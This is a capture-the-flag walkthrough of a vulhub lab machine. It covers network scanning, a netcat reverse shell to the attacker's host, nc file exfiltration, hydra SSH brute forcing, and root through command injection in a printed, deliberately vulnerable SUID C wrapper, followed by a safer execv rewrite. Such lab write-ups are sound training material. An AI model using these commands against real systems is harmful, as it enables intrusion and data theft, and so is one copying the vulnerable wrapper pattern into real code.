vulhub target practice, week 2

Week 2

Information gathering

Host discovery

Both arping and arp-scan can be used; arping is included by default in most Linux distributions.

However, arping cannot scan a whole subnet, so a shell loop is used to make up for that:

for i in $(seq 1 254); do sudo arping -c 2 10.0.2.$i;done

┌──(kali㉿kali)-[~/Tools/flask-session-cookie-manager]
└─$ sudo arp-scan -l -I eth0
Interface: eth0, type: EN10MB, MAC: 00:0c:29:bb:17:07, IPv4: 192.168.64.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.64.1    00:50:56:c0:00:08       VMware, Inc.
192.168.64.2    00:50:56:e3:65:6e       VMware, Inc.
192.168.64.135  00:0c:29:4b:7a:01       VMware, Inc.
192.168.64.254  00:50:56:ee:a4:c0       VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.038 seconds (125.61 hosts/sec). 4 responded

nmap can also be used for host discovery:

┌──(kali㉿kali)-[~/Tools/flask-session-cookie-manager]
└─$ sudo nmap -sn -PP 192.168.64.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-11 16:06 CST
Nmap scan report for 192.168.64.1
Host is up (0.0063s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.64.2
Host is up (0.00011s latency).
MAC Address: 00:50:56:E3:65:6E (VMware)
Nmap scan report for 192.168.64.135
Host is up (0.0036s latency).
MAC Address: 00:0C:29:4B:7A:01 (VMware)
Nmap scan report for 192.168.64.254
Host is up (0.00016s latency).
MAC Address: 00:50:56:EE:A4:C0 (VMware)
Nmap scan report for 192.168.64.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.33 seconds

Full port scan

┌──(kali㉿kali)-[~/Tools/flask-session-cookie-manager]
└─$ sudo nmap --min-rate 10000 -p- 192.168.64.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-11 16:06 CST
Nmap scan report for 192.168.64.135
Host is up (0.00058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy
MAC Address: 00:0C:29:4B:7A:01 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.51 seconds

Detailed service and OS probing:

┌──(kali㉿kali)-[~/Tools/flask-session-cookie-manager]
└─$ sudo nmap -sV -sT -O -p22,8080 192.168.64.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-11 16:07 CST
Nmap scan report for 192.168.64.135
Host is up (0.00038s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
MAC Address: 00:0C:29:4B:7A:01 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.02 seconds

There is a service on port 8080, so let's visit it in a browser.

The page has a single input box; after some testing it turned out to be vulnerable to SQL injection.


After logging in, we found a function that executes system commands.

So let's pop a reverse shell from it:

bash;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.64.128 2333 >/tmp/f

SUID privilege escalation did not work here.

So we continued gathering information and found a SQL file in the application directory:

scanner@cloudav:~/cloudav_app$ ls
ls
app.py  database.sql  samples  templates

Transfer it to the attacking machine with nc:

On the target: nc 192.168.64.128 4444 < database.sql

On Kali: sudo nc -lvnp 4444 > database.sql

Then inspect on Kali what the SQL file contains (it is actually a SQLite database, not a SQL dump):

┌──(kali㉿kali)-[~/HTB/week2]
└─$ file database.sql                                       
database.sql: SQLite 3.x database, last written using SQLite version 3011000, page size 1024, file counter 4, database pages 2, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                           
┌──(kali㉿kali)-[~/HTB/week2]
└─$ sqlite3 database.sql                                    
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .databases;
Error: unknown command or invalid arguments:  "databases;". Enter ".help" for help
sqlite> .database
main: /home/kali/HTB/week2/database.sql r/w
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE `code` (
        `password`      TEXT
);
INSERT INTO code VALUES('myinvitecode123');
INSERT INTO code VALUES('mysecondinvitecode');
INSERT INTO code VALUES('cloudavtech');
INSERT INTO code VALUES('mostsecurescanner');
COMMIT;
sqlite>

Four passwords were found; let's see how many accounts on the target have a login shell.

scanner@cloudav:~/cloudav_app$ cat /etc/passwd | grep "/bin/bash"
cat /etc/passwd | grep "/bin/bash"
root:x:0:0:root:/root:/bin/bash
cloudav:x:1000:1000:cloudav:/home/cloudav:/bin/bash
scanner:x:1001:1001:scanner,,,:/home/scanner:/bin/bash

Three accounts can log in.

Brute-force SSH with hydra. First create two files, user.txt:

root
cloudav
scanner

and password.txt:

myinvitecode123
mysecondinvitecode
cloudavtech
mostsecurescanner

Run the brute force:

┌──(kali㉿kali)-[~/HTB/week2]
└─$ hydra -L user.txt -P password.txt ssh://192.168.64.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-11 17:18:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:3/p:4), ~1 try per task
[DATA] attacking ssh://192.168.64.135:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-11 17:18:35

The brute force failed as well, so we looked for anything else exploitable. In /home/scanner there is a C program (update_cloudav) owned by root with the SUID bit set; let's look at its source code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    char *freshclam = "/usr/bin/freshclam";
    if (argc < 2) {
        printf("This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam\n");
        return 1;
    }
    /* argv[1] is concatenated into the command line unchecked */
    char *command = malloc(strlen(freshclam) + strlen(argv[1]) + 2);
    sprintf(command, "%s %s", freshclam, argv[1]);
    /* privileges are raised to root before the string is handed to /bin/sh */
    setgid(0);
    setuid(0);
    system(command);
    return 0;
}

The program builds a command string and runs it with system(); it requires one argument, and only the first argument (argv[1]) is appended to the freshclam command line.

Something odd shows up here:

$ ./update_cloudav "whoami;id"
ERROR: Problem with internal logger (UpdateLogFile = /var/log/clamav/freshclam.log).
ERROR: /var/log/clamav/freshclam.log is locked by another process
uid=0(root) gid=0(root) groups=0(root),1001(scanner)
$ ./update_cloudav whoami;id
ERROR: Problem with internal logger (UpdateLogFile = /var/log/clamav/freshclam.log).
ERROR: /var/log/clamav/freshclam.log is locked by another process
uid=1001(scanner) gid=1001(scanner) groups=1001(scanner)

Without the quotes, the id command does not run as root.

Why the difference?

When the argument is quoted, as in ./update_cloudav "whoami;id", your shell passes the whole string whoami;id as a single argument (argv[1]) to the program. The program concatenates it into /usr/bin/freshclam whoami;id, raises its privileges with setuid(0), and hands that string to system(), which runs it through /bin/sh. That child shell treats ; as a command separator, so after freshclam fails it runs whoami and id as root, which is why the output shows uid=0(root).

Without quotes, as in ./update_cloudav whoami;id, the ; is interpreted by your own interactive shell before the program ever runs. That shell splits the line into two separate commands, ./update_cloudav whoami and id. Only whoami reaches the program as argv[1]; id is executed directly by your own shell as the scanner user, which is why it reports uid=1001(scanner).
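The root cause is that a SUID root binary passes untrusted argv[1] through /bin/sh via system(). The following is an added example of how such a wrapper should be written instead, not code from the box or the author: the argument is checked against a small allowlist (the allowed character set is an assumption for this example) and freshclam is started with execv() and an explicit argument vector, so no shell ever parses the string and ; | $( ) have no special meaning.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

static const char *FRESHCLAM = "/usr/bin/freshclam";

/* Returns 1 if arg looks like a plain freshclam option, 0 otherwise.
   Allowlist (letters, digits, - _ . = /) is an assumption for this
   example; narrow it to the options the wrapper actually needs. */
int arg_is_allowed(const char *arg)
{
    if (arg == NULL || *arg == '\0' || strlen(arg) > 128)
        return 0;
    for (const char *p = arg; *p; p++) {
        if (!isalnum((unsigned char)*p) && strchr("-_.=/", *p) == NULL)
            return 0;   /* rejects ; | & $ ` ( ) space, quotes, etc. */
    }
    return 1;
}

/* Runs freshclam with exactly one argument via fork/execv: the kernel
   receives an argv array, so the argument is never re-parsed by a shell.
   Returns the child's exit status, or -1 if the argument was rejected
   or the process could not be started/waited for. */
int run_freshclam(const char *arg)
{
    if (!arg_is_allowed(arg))
        return -1;
    char *argv[] = { (char *)FRESHCLAM, (char *)arg, NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], argv);
        _exit(127);             /* exec failed, e.g. binary missing */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <freshclam-option>\n", argv[0]);
        return 1;
    }
    return run_freshclam(argv[1]);   /* -1 here means the argument was rejected */
}
```

Note that the example also drops the explicit setgid(0)/setuid(0) calls: if the wrapper genuinely has to run freshclam as root, the SUID bit alone already provides that, and the validated argv array is what keeps the shell out of the picture.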

So we use the quoted form to get a root shell.

That completes the box.
